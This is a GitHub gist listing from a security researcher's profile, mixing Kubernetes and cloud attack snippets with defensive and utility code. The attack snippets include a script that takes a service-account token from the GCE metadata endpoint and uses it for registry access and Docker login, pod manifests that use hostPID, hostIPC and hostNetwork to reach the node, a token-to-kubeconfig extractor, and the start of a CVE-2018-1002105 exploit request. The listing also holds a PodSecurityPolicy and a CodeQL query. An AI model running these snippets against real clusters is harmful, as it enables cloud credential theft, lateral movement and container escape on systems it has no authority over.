Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

Abhisek Datta abhisek

🏠
Working from home
View GitHub Profile
@abhisek
abhisek / gke-pod-hacks.sh
Last active May 12, 2020
Lateral movement in GKE Pod using Cloud metadata endpoint
View gke-pod-hacks.sh
# Get temporary access token using Google Cloud instance metadata
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \
jq -r '.access_token')
# List all repo from Google cloud registry using access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog
# Docker login
echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io
@abhisek
abhisek / go-int-down-casting.ql
Created May 2, 2020
CodeQL query to find integer casting issues
View go-int-down-casting.ql
import go
import semmle.go.dataflow.DataFlow
import semmle.go.dataflow.TaintTracking
class IntegerSource extends Function {
IntegerSource() {
this.hasQualifiedName("strconv", "Atoi") or
this.hasQualifiedName("strconv", "ParseInt")
}
}
@abhisek
abhisek / ghidra.sh
Created Apr 20, 2020
Ghidra in docker
View ghidra.sh
ghidra () {
del_stopped ghidra
xhost +local:root
docker run --init -it --rm --name ghidra --cpus 2 --memory 4g -e MAXMEM=4G -v /etc/localtime:/etc/localtime:ro -v /tmp/.X11-unix:/tmp/.X11-unix -v "${HOME}/.gtkrc:/root/.gtkrc" -e "DISPLAY=unix${DISPLAY}" -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra -v /home/user1/Work/ghidra:/root/storage blacktop/ghidra
xhost -local:root
}
ghidra
@abhisek
abhisek / psp.yml
Created Mar 17, 2020
PodSecurityPolicy to Prevent hostPath Mount
View psp.yml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: developers-psp
spec:
privileged: false
allowPrivilegeEscalation: false
hostNetwork: false
hostPID: false
hostIPC: false
@abhisek
abhisek / pod-to-node.yml
Created Mar 17, 2020
Kubernetes Pod hostPath Volume Mount
View pod-to-node.yml
apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
spec:
hostPID: true
hostIPC: true
hostNetwork: true
@abhisek
abhisek / sa-to-kubeconfig.sh
Created Mar 17, 2020
Generate kubeconfig for Service Account
View sa-to-kubeconfig.sh
#!/bin/bash
export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g')
export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}')
export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d)
export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}")
cat <<EOF
apiVersion: v1
kind: Config
@abhisek
abhisek / k8s-sa-pod-crud.yml
Created Mar 17, 2020
Kubernetes Service Account with Pod CRUD Privilege to Single Namespace
View k8s-sa-pod-crud.yml
apiVersion: v1
kind: Namespace
metadata:
name: developers
---
apiVersion: v1
kind: ServiceAccount
metadata:
@abhisek
abhisek / pod-node-access.yml
Created Nov 20, 2019
Pod with Node Access
View pod-node-access.yml
apiVersion: v1
kind: Pod
metadata:
labels:
run: ubuntu-1
name: ubuntu-1
spec:
hostPID: true
hostIPC: true
hostNetwork: true
@abhisek
abhisek / mongo-api-client.js
Created Jul 5, 2019
Mongo Cloud Atlas Events API to Elasticsearch
View mongo-api-client.js
'use strict'
const MONGO_ATLAS_USERNAME = 'USER'
const MONGO_ATLAS_APIKEY = 'APIKEY'
const MONGO_ATLAS_STAGING_GROUP_ID = 'ID1'
const MONGO_ATLAS_PRODUCTION_GROUP_ID = 'ID2'
const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events'
@abhisek
abhisek / gist:3ef7f1e208d46771cb79b6440028b787
Created Dec 7, 2018
Kubernetes Exploit CVE-2018–1002105
View gist:3ef7f1e208d46771cb79b6440028b787
GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1
Authorization: Bearer $TOKEN
Host: 192.168.12.10:6443
Connection: upgrade
Upgrade: websocket